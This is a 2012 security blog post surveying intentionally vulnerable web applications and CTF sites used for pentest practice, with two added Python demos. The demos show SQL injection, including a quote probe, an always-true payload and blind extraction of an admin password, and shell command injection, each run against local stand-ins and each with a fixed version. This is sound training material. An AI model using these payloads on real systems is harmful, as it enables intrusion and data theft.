Thursday, March 1, 2012

Vulnerable by Definition

Many people who work in or around security want to try pentesting at some point. Most start with web applications. The barrier to entry is low (the simplest SQL injection can be detected by adding a single quotation mark to a parameter, and exploiting it is almost as easy), but there are still hard tasks that take several days of careful work.
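The quotation-mark test mentioned above, carried through to exploitation, as an added example that is not part of the original post. It uses an in-memory SQLite table as a stand-in for a practice range's backend; the table, rows and credentials are constructed for the example, and the function names are mine. The vulnerable query is built by string concatenation, exactly the pattern the training applications below exercise; the fixed version binds the value as a parameter.

```python
import sqlite3


def make_db():
    # Constructed in-memory database standing in for a practice range's
    # backend; the table, rows and credentials are made up for this example.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    # Deliberately vulnerable: the parameter is spliced into the SQL text,
    # the same pattern the DVWA/Mutillidae SQL injection exercises use.
    sql = "SELECT name FROM users WHERE id = '" + user_id + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_fixed(conn, user_id):
    # Hardened form: the value travels as a bound parameter, never as SQL text.
    sql = "SELECT name FROM users WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (user_id,))]


def probe_quote(conn, lookup):
    # The quotation-mark test: an error on a lone single quote that goes away
    # when the quote is doubled (SQL-escaped) means the input is being
    # inserted into a string literal.
    def outcome(value):
        try:
            lookup(conn, value)
            return "ok"
        except sqlite3.OperationalError:  # unterminated string / syntax error
            return "error"
    return outcome("1'") == "error" and outcome("1''") == "ok"


def blind_extract(conn, column, max_len=32):
    # Boolean-based blind extraction: the page only tells us whether a row
    # came back, so the admin's value is guessed one character at a time.
    charset = "abcdefghijklmnopqrstuvwxyz0123456789"
    found = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            payload = ("1' AND substr((SELECT %s FROM users WHERE name='admin'),%d,1)='%s"
                       % (column, pos, ch))
            if lookup_vulnerable(conn, payload):
                found += ch
                break
        else:
            break  # no character matched: end of the value
    return found


if __name__ == "__main__":
    db = make_db()
    print("vulnerable endpoint injectable:", probe_quote(db, lookup_vulnerable))
    print("fixed endpoint injectable:     ", probe_quote(db, lookup_fixed))
    print("tautology dumps every user:    ", lookup_vulnerable(db, "1' OR '1'='1"))
    print("admin password via blind SQLi: ", blind_extract(db, "password"))
```

The probe deliberately sends both `1'` and `1''`: a server that errors on both is probably just broken, while one that errors only on the unbalanced quote is splicing the input into a query. The blind loop is the slow path you fall back to when the error text and the query results are not shown, which is what the "SQL Injection (Blind)" exercises are about.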

But where can this theoretical knowledge be applied without fear of prosecution? Below is an overview of "proving grounds" for pentesting experiments.

All the ‘proving grounds’ can be divided into the following categories and subcategories:

  • Complete OS images with a set of vulnerable services, including vulnerable web applications
  • Distribution kits of vulnerable web applications (offline)
  • Vulnerable web applications which are close to real ones (online)
  • Vulnerable web applications in the CTF format (online)

Distribution kits of vulnerable web applications (offline)

Vulnerable distribution kits are the easiest to get started with: everything runs locally, so there is no separate sandbox to set up as there would be for the online applications. Since these applications are vulnerable by design, run them on a virtual machine or another isolated host rather than on a workstation that is reachable from the network.

Mutillidae

The Mutillidae project covers every category in the OWASP Top 10, a periodically updated list of the ten most critical web application security risks that both developers and security specialists should pay attention to.

Several tasks are available for each vulnerability from the Top 10 list:

It is possible to change the application’s security level and enable hints:


The scripts run with full privileges, so a command injection hands the attacker those same privileges:

Currently, version 2.0.7 is available.
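The command injection class shown in the Mutillidae exercise, as an added example that is not part of the original post or of Mutillidae itself. It uses `echo` as a stand-in for the ping binary so that it runs anywhere; the host pattern, function names and the `INJECTED` marker are mine. The vulnerable function pastes user input into a shell command line; the argv-only variant shows that bypassing the shell alone already defuses metacharacters, and the hardened form adds validation so that an argument such as `-c` cannot be smuggled into the command either.

```python
import re
import subprocess

# Assumed validation rule for this example: hostname characters only, and
# no leading dash so the value can never be parsed as an option.
HOST_RE = re.compile(r"^(?!-)[A-Za-z0-9.-]{1,253}$")


def ping_vulnerable(host):
    # Deliberately vulnerable: the input becomes part of a shell command line,
    # so ";", "|", "&&" or "$()" run extra commands with the web server's
    # privileges. "echo" stands in for the real ping binary.
    cmd = "echo pinging " + host
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def ping_argv_only(host):
    # No shell involved: the input is a single argv element, so metacharacters
    # are passed to the program as literal text.
    return subprocess.run(["echo", "pinging", host],
                          capture_output=True, text=True).stdout


def is_safe_host(host):
    return HOST_RE.match(host) is not None


def ping_fixed(host):
    # Hardened form: validate first (argument injection such as "-c 99999"
    # would otherwise still reach the program), then pass it via argv.
    if not is_safe_host(host):
        raise ValueError("invalid host: %r" % host)
    return ping_argv_only(host)


def injection_succeeded(output, marker="INJECTED"):
    # The injected command prints the marker on its own line; if the marker
    # shows up as a separate line, a second command actually ran.
    return marker in output.splitlines()


if __name__ == "__main__":
    payload = "127.0.0.1; echo INJECTED"
    print("shell=True  :", repr(ping_vulnerable(payload)))
    print("argv only   :", repr(ping_argv_only(payload)))
    try:
        ping_fixed(payload)
    except ValueError as exc:
        print("validated   : rejected,", exc)
```

In the training applications the injected command runs under the web server's account, which in a default Mutillidae installation is exactly the "full privileges" situation the screenshot illustrates; on a real target the marker would be replaced by something like `id` or a reverse shell.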

OWASP WebGoat

This one is an OWASP project itself. Besides the lesson scripts it ships its own web server (Tomcat), so it can be started directly on your workstation with a .bat file.

One thing sets it apart from Mutillidae: it is not enough to execute something, you have to achieve a specific result. Once the result is achieved, the lesson is marked as completed in the task list:

Some lessons ask you to fix the code rather than attack it.

Information about the project is available here.

If you get stuck, there is a demonstration video for each lesson (the links are on the lesson pages).

Damn Vulnerable Web App (DVWA)

This project is similar to Mutillidae: instead of specific tasks to complete, it provides a set of scripts with the standard vulnerabilities:

  • Brute Force
  • Command Execution
  • CSRF
  • File Inclusion
  • SQL Injection
  • SQL Injection (Blind)
  • Upload
  • Reflected XSS
  • Stored XSS

The results are shown as close as possible to what you would see in real life:

Currently, version 1.0.7 is available.

Vulnerable web applications which are close to real ones (online)

Acunetix test sites

Acunetix demonstrates its scanner on the following deliberately vulnerable websites:

You can also dig into the vulnerabilities manually.


Below is a set of sites vulnerable to XSS. To exploit them successfully, you have to bypass their filtering, which sometimes requires thinking outside the box.

Vulnerable web applications in the CTF format (online)

In my opinion, this is the most enjoyable part. All tasks are done online, so no additional software has to be installed, and there is an explicit goal to reach: capture the flag.

Hack This Site

The project offers a set of so-called missions grouped by difficulty. There are basic missions, such as retrieving and listing the contents of a file that sits in the same directory as a script.

There are also missions with close-to-real-life conditions, for example obtaining the full list of registered users' e-mail addresses (from the training site hosted by HackThisSite, of course).

Each mission has a forum where you can find hints or a complete walkthrough. You can register and try the missions here.


This is a similar project with its own set of basic missions, in which the password (flag) is found, for example, in the page source:

Or where the simplest SQL injection has to be performed:

And of course there are missions set on sites with close-to-real-life conditions, where various methods have to be combined to find the flag:

Time-limited CTFs

Finally, there are CTF competitions, which include tasks of various types, from web application hacking to reversing and forensics. The calendar of upcoming events is available here:

Tasks from past competitions are also available on that site. Descriptions of the competitions and write-ups of the tasks are usually published by the winning teams (Leet More, EINDBAZEN, PPP) and also appear on specialized forums, for example rdot:

Virtual machine images from past competitions can also be found, for instance from PHD 2011:

Or from iCTF and ruCTF:

In lieu of a conclusion

Besides the ranges listed above there are plenty of other interesting things, but I do not have the time to test them all, so here are links to some blogs:

Author: Igor Bulatenko, expert at the Positive Research center
